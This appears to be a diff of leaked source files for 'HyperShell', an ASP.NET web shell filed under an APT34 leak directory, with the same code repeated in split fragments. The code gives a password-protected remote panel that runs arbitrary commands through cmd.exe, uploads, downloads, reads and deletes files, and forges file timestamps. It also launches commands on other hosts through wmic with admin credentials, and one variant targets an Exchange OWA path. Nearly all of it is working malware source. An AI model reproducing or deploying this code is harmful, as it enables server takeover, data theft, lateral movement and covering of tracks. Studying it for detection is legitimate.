case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="sdfewq@#$51234234DF@#$!@#$ASDF";
string p,adminU,adminP;
bool aut=false;
string pp="J3ugYdknpax1ZbHB2QILB5NS6dVa0iUD0mhhBPv0Srw=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium\";}
void downloadTest(string fdlpath)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(fdlpath))
{
using (System.IO.Stream stream = new System.IO.FileStream(fdlpath, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", fdlpath);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string fdlpath, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(fdlpath)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(fdlpath).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(fdlpath))));
response.WriteFile(fdlpath);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}
string exec(string cmd){string pro="";System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Length==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
string[] diskTemp = new string[100];
for (int i = 1; i <= 5; i++)
{
string f = string.Format(strWF, tmp, i);
string[] lDisk = System.IO.File.ReadAllLines(f);
exec(string.Format(strWD, f));
for (int j = 1; j < lDisk.Length; j++)
{
if (i == 1) diskTemp[j - 1] = lDisk[j];
else diskTemp[j - 1] += "|" + lDisk[j];
}
}
ret = "{\"dir\":[";
bool isStart = false;
foreach (string item in diskTemp)
{
if (!string.IsNullOrEmpty(item))
{
string[] diskInfo = item.Split('|');
long TotalSize = 0;
long TotalFreeSpace = 0;
long.TryParse(diskInfo[2], out TotalSize);
long.TryParse(diskInfo[3], out TotalFreeSpace);
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}", diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':') + "$", TotalSize, TotalFreeSpace, "[" + sizeFix(TotalFreeSpace) + "] free of [" + sizeFix(TotalSize) + "]", diskInfo[1], diskInfo[4]);
isStart = true;
}
}
ret += "]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}
string createJsonDirectory(System.IO.DirectoryInfo[] dir){
string json="\"dir\":[";
for (int i=0;i<dir.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"mdate\":\"{1}\"}}",dir[i].Name,dir[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string createJsonFile(System.IO.FileInfo[] file){
string json="\"file\":[";
for (int i=0;i<file.Length;i++){
if (i>0)json+=",";
json +=string.Format("{{\"name\":\"{0}\",\"size\":\"{1}\",\"mdate\":\"{2}\"}}",file[i].Name,sizeFix(file[i].Length),file[i].LastWriteTime.ToString("yyyy-MM-dd"));
}
json +="]";
return json;
}
string sizeFix(long size){double s=size;if(s<1024)return s+" B";s=s/1024;if(s<1024)return Math.Round(s,2)+" KB";s=s/1024;if(s<1024)return Math.Round(s,2)+" MB";s=s/1024;if(s<1024)return Math.Round(s,2)+" GB";s=s/1024;return Math.Round(s,2)+" TB";}
void response(string res){Response.Clear();Response.Write(tb(res));Response.Flush();Response.SuppressContent=true;ApplicationInstance.CompleteRequest();}
void changeTime(string timeh,string tfil,string ttar,string ttim){string ret="Error : -";try {if(!string.IsNullOrEmpty(tfil)){if(timeh=="1")ret=ti(tfil);else if(timeh=="2"){if(!string.IsNullOrEmpty(ttar)){System.IO.File.SetCreationTime(tfil,System.IO.File.GetCreationTime(ttar));System.IO.File.SetLastAccessTime(tfil,System.IO.File.GetLastAccessTime(ttar));System.IO.File.SetLastWriteTime(tfil,System.IO.File.GetLastWriteTime(ttar));ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}else if(timeh=="3"){if(!string.IsNullOrEmpty(ttim)){DateTime te=DateTime.Parse(ttim);System.IO.File.SetCreationTime(tfil,te);System.IO.File.SetLastAccessTime(tfil,te);System.IO.File.SetLastWriteTime(tfil,te);ret="Time successfuly changed :<br>"+tfil+"<br>"+ti(tfil);}}}}catch(Exception e){ret="Error : "+e.Message;}response(ret);}
string ti(string tt){return "Creation Time :\t\t"+System.IO.File.GetCreationTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Access Time :\t"+System.IO.File.GetLastAccessTime(tt).ToString("yyyy-MM-dd HH:mm:ss")+"<br>Last Write Time :\t"+System.IO.File.GetLastWriteTime(tt).ToString("yyyy-MM-dd HH:mm:ss");}
</script>

57
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p1.txt Normal file
View File

@@ -0,0 +1,57 @@
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
<%
try
{
NameValueCollection t=HttpContext.Current.Request.Form;
method selectedMethod=method.auth;
try{int methodID=int.Parse(fb(t["m"]));selectedMethod=(method)methodID;}catch{rm();}
p=fb(t["p"]);
adminU=fb(t["adminU"]);
adminP=fb(t["adminP"]);
if(string.IsNullOrEmpty(p)){if(HttpContext.Current.Request.Cookies["p"] != null)p=fb(HttpContext.Current.Request.Cookies["p"].Value);}
if(selectedMethod != method.auth && selectedMethod != method.authAjax && !login(p)){rm();}
switch(selectedMethod){
case method.auth:
case method.authAjax:auth(p);break;
case method.command:
case method.commandAjax:command(fb(t["cmd"]));break;
case method.upload:upload(HttpContext.Current.Request.Files["uploadFile"],fb(t["uploadPath"]));break;
case method.download:download(fb(t["don"]),fb(t["isdel"]));break;
case method.downloadTest:downloadTest(fb(t["don"]));break;
case method.explorer:exp(fb(t["exadd"]));break;
case method.getsize:gsize(fb(t["gsize"]));break;
case method.getlocation:
case method.getlocationAjax:response(getLoc());break;
case method.rename:rename(fb(t["rename1"]),fb(t["rename2"]));break;
case method.copy:copy(fb(t["copy1"]),fb(t["copy2"]));break;
case method.view:view(fb(t["view"]));break;
case method.delete:delete(fb(t["delete"]));break;
case method.multiDelete:multiDelete(fb(t["delete"]));break;
case method.changeTime:changeTime(fb(t["timeh"]),fb(t["tfil"]),fb(t["ttar"]),fb(t["ttim"]));break;
default:break;
}
}
catch(Exception ex){response("Error : "+ex.Message);}
%>
<script runat="server">
enum method{auth=0,command=1,upload=2,uploadbase64=3,delete=4,download=5,changeTime=6,sqlQuery=7,explorer=8,getsize=9,getlocation=10,rename=11,copy=12,view=13,commandAjax=14,downloadTest=15,checkModules=16,installModule=17,uninstallModule=18,cmd7z=19,authAjax=20,getlocationAjax=21,multiDelete=24};
string salt="sdfewq@#$51234234DF@#$!@#$ASDF";
string p,adminU,adminP;
bool aut=false;
string pp="J3ugYdknpax1ZbHB2QILB5NS6dVa0iUD0mhhBPv0Srw=";
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
string tb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));}catch{}return ret;}
string fb(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
void rm(){Response.Redirect(Request.Url.AbsolutePath.Substring(0,Request.Url.AbsolutePath.LastIndexOf("/")+1)+" "+Request.Url.AbsolutePath.Substring(Request.Url.AbsolutePath.LastIndexOf("/")+1));}
void auth(string p){
string ret=string.Empty;
try {
ret = string.Format("{{\"auth\":\"{0}\",\"loc\":\"{1}\"}}", login(p).ToString(),tb(getLoc()));
} catch(Exception e){
ret ="Error : "+e.Message;
}
response(ret);
}
bool login(string p){bool aut=false;try{if(!string.IsNullOrEmpty(p)){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(p+salt)))==pp;}}catch(Exception e){response(e.Message);}return aut;}
void command(string cmd){string ret="Error : -";try{string o=exec(cmd);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine)+2);o=o.Remove(0,o.IndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine));o=o.Remove(o.LastIndexOf(Environment.NewLine)+2);ret=HttpUtility.HtmlEncode(o);}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}

82
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p2.txt Normal file
View File

@@ -0,0 +1,82 @@
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
string getLoc(){return Server.MapPath(string.Empty)+"\\";}
void downloadTest(string fdlpath)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(fdlpath))
{
using (System.IO.Stream stream = new System.IO.FileStream(fdlpath, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", fdlpath);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}
void download(string fdlpath, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(fdlpath)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(fdlpath).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(fdlpath))));
response.WriteFile(fdlpath);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}

39
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p21.txt Normal file
View File

@@ -0,0 +1,39 @@
void upload(HttpPostedFile uploadFile,string uploadPath)
{
string ret="Error : -";
try {
if (System.IO.Path.IsPathRooted(uploadPath))
{
string FileName = System.IO.Path.GetFileName(uploadFile.FileName);
string FilePath = uploadPath.TrimEnd('\\') + "\\";
if (string.IsNullOrEmpty(System.IO.Path.GetExtension(uploadPath)))
{
if (!System.IO.Directory.Exists(uploadPath))
{
if (!string.IsNullOrEmpty(System.IO.Path.GetFileName(uploadPath)))
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
}
}
else
{
FileName = System.IO.Path.GetFileName(uploadPath);
FilePath = System.IO.Path.GetDirectoryName(uploadPath) + "\\";
}
if (!System.IO.Directory.Exists(FilePath))
System.IO.Directory.CreateDirectory(FilePath);
uploadFile.SaveAs(FilePath + FileName);
ret ="File uploaded successfully : "+ FilePath + FileName;
}
else
ret="Error : The path is not current format \""+uploadPath+"\"";
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}

20
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p22.txt Normal file
View File

@@ -0,0 +1,20 @@
string getLoc(){return @"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium\";}
void downloadTest(string fdlpath)
{
string ret = "Error : -";
try
{
if (!string.IsNullOrEmpty(fdlpath))
{
using (System.IO.Stream stream = new System.IO.FileStream(fdlpath, System.IO.FileMode.Open))
{
ret = string.Format("File '{0}' is ready for download", fdlpath);
}
}
}
catch (Exception e)
{
ret = "Error : " + e.Message;
}
response(ret);
}

23
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p23.txt Normal file
View File

@@ -0,0 +1,23 @@
void download(string fdlpath, string isdel)
{
string ret="Error : -";
try {
if (!string.IsNullOrEmpty(fdlpath)){
System.Web.HttpResponse response = System.Web.HttpContext.Current.Response;
response.ClearContent();
response.Clear();
response.ClearHeaders();
response.ContentType = "application/octet-stream";
response.AppendHeader("Content-Disposition", "attachment;size="+new System.IO.FileInfo(fdlpath).Length+";filename=" + HttpUtility.UrlEncode(tb(System.IO.Path.GetFileName(fdlpath))));
response.WriteFile(fdlpath);
response.Flush();
Response.SuppressContent = true;
ApplicationInstance.CompleteRequest();
}
}
catch(Exception e)
{
ret = "Error : " + e.Message;
response(ret);
}
}

32
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p3.txt Normal file
View File

@@ -0,0 +1,32 @@
string exec(string cmd){string pro="";System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();return o;}
void gsize(string addr){string ret="Error : -";try{hasErrorInGetSize=false;long size=GetDirSize(new System.IO.DirectoryInfo(addr));ret=sizeFix(size);if(hasErrorInGetSize && sizelvl==0)ret=sizeError;else if(hasErrorInGetSize)ret="!"+ret;}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void view(string path){string ret="You are viewing the contents of this file : "+path+Environment.NewLine;try{ret+=System.IO.File.ReadAllText(path);}catch(Exception ex){ret="Error : "+ex.Message;}response(HttpUtility.HtmlEncode(ret));}
void delete(string path){
string ret="Error : -";
try {
System.IO.File.Delete(path);
ret =string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly deleted{1}",path,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(path))));
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void multiDelete(string files)
{
string ret="Error : -";
try{
string[] f = files.Split('|');
ret = string.Format("All '{0}' files successfuly deleted.", f.Length);
foreach (string item in f)
{
System.IO.File.Delete(fb(item));
}
}catch (Exception ex){
ret ="Error : "+ex.Message;
}
response(ret);
}
void rename(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Move(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly moved to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}
void copy(string oldName,string newName){string ret="Error : -";try{if(newName.EndsWith("\\"))newName+=System.IO.Path.GetFileName(oldName);System.IO.File.Copy(oldName,newName);ret=string.Format("{{\"message\":\"{0}\",\"dirInfo\":\"{1}\"}}",tb(string.Format("File '{0}' successfuly copied to '{1}'{2}",oldName,newName,Environment.NewLine)),tb(getDirectoryInfo(System.IO.Path.GetDirectoryName(oldName))));}catch(Exception ex){ret="Error : "+ex.Message;}response(ret);}

45
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p4.txt Normal file
View File

@@ -0,0 +1,45 @@
string getDirectoryInfo(string address)
{
string ret="Error : -";
try {
if (address.ToLower()=="root"){
ret ="{\"dir\":[{\"name\":\"\\\\\\\\localhost\"}";
string netUse=exec("net use");
string[] lines=netUse.Split(new string[]{Environment.NewLine },StringSplitOptions.RemoveEmptyEntries);
foreach (string item in lines){
if (item.ToLower().StartsWith("ok")){
int index=item.IndexOf("\\\\");
ret +=",{\"name\":\"\\\\"+item.Substring(index,item.IndexOf('\\',index+2)-index)+"\"}";
}
}
ret +="]}";
} else{
if (address.StartsWith("\\\\")&& address.Trim('\\').Split('\\').Length==1){
string tmp=address.ToLower().TrimEnd('\\');
if (tmp=="\\\\localhost"){
ret ="{\"dir\":[";
bool isStart=false;
foreach (System.IO.DriveInfo item in System.IO.DriveInfo.GetDrives()){
if (item.IsReady){
if (isStart)
ret +=",";
ret +=string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}",item.Name.TrimEnd('\\').TrimEnd(':')+"$",item.TotalSize,item.TotalFreeSpace,"["+sizeFix(item.TotalFreeSpace)+"] free of ["+sizeFix(item.TotalSize)+"]",item.DriveFormat,item.DriveType);
isStart =true;
}
}
ret +="]}";
} else{
if (!string.IsNullOrEmpty(adminU)&& !string.IsNullOrEmpty(adminP)){
string strWC=@"wmic /node:{0} /user:{1} /password:{2} process call create ""cmd.exe /c > c:\windows\temp\KMSHFX0023{3}.tmp 2>&1 wmic logicaldisk get {4}"" 2>&1";
string strWF=@"\\{0}\c$\windows\temp\KMSHFX0023{1}.tmp";
string strWD=@"del {0} 2>&1";
tmp =tmp.TrimStart('\\');
exec(string.Format(strWC,tmp,adminU,adminP,1,"Caption"));
exec(string.Format(strWC,tmp,adminU,adminP,2,"FileSystem"));
exec(string.Format(strWC,tmp,adminU,adminP,3,"Size"));
exec(string.Format(strWC,tmp,adminU,adminP,4,"FreeSpace"));
exec(string.Format(strWC,tmp,adminU,adminP,5,"Description"));
System.Threading.Thread.Sleep(3000);
string[] diskTemp = new string[100];
for (int i = 1; i <= 5; i++)
{

48
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p5.txt Normal file
View File

@@ -0,0 +1,48 @@
string f = string.Format(strWF, tmp, i);
string[] lDisk = System.IO.File.ReadAllLines(f);
exec(string.Format(strWD, f));
for (int j = 1; j < lDisk.Length; j++)
{
if (i == 1) diskTemp[j - 1] = lDisk[j];
else diskTemp[j - 1] += "|" + lDisk[j];
}
}
ret = "{\"dir\":[";
bool isStart = false;
foreach (string item in diskTemp)
{
if (!string.IsNullOrEmpty(item))
{
string[] diskInfo = item.Split('|');
long TotalSize = 0;
long TotalFreeSpace = 0;
long.TryParse(diskInfo[2], out TotalSize);
long.TryParse(diskInfo[3], out TotalFreeSpace);
if (isStart)
ret += ",";
ret += string.Format("{{\"name\":\"{0}\",\"totalSize\":\"{1}\",\"freeSpace\":\"{2}\",\"sizeText\":\"{3}\",\"format\":\"{4}\",\"type\":\"{5}\"}}", diskInfo[0].TrimEnd('\\').TrimEnd(' ').TrimEnd(':') + "$", TotalSize, TotalFreeSpace, "[" + sizeFix(TotalFreeSpace) + "] free of [" + sizeFix(TotalSize) + "]", diskInfo[1], diskInfo[4]);
isStart = true;
}
}
ret += "]}";
} else
ret ="Error : Admin Username or Password is empty";
}
} else{
System.IO.FileAttributes attr=System.IO.File.GetAttributes(address);
if ((attr & System.IO.FileAttributes.Directory)==System.IO.FileAttributes.Directory){
System.IO.DirectoryInfo dirInfo=new System.IO.DirectoryInfo(address);
ret ="{"+string.Format("{0},{1}",createJsonDirectory(dirInfo.GetDirectories()),createJsonFile(dirInfo.GetFiles()))+"}";
}
}
}
} catch(Exception ex){
ret ="Error : "+ex.Message;
}
return ret;
}
void exp(string exadd){string ret="Error : -";ret=getDirectoryInfo(exadd);response(ret);}
bool hasErrorInGetSize=false;
int sizelvl=0;
string sizeError;
long GetDirSize(System.IO.DirectoryInfo d){long size=0;try{System.IO.FileInfo[] fis=d.GetFiles();foreach(System.IO.FileInfo fi in fis){size+=fi.Length;}sizelvl++;System.IO.DirectoryInfo[] dis=d.GetDirectories();foreach(System.IO.DirectoryInfo di in dis){size+=GetDirSize(di);}}catch(UnauthorizedAccessException ex){sizeError="Error : "+ex.Message;hasErrorInGetSize=true;}return size;}

24
APT34/APT34-LeakCode/Webshells_and_Panel/HyperShell/HyperShell/ShellLocal-Parts/p6.txt Normal file
View File

@@ -0,0 +1,24 @@
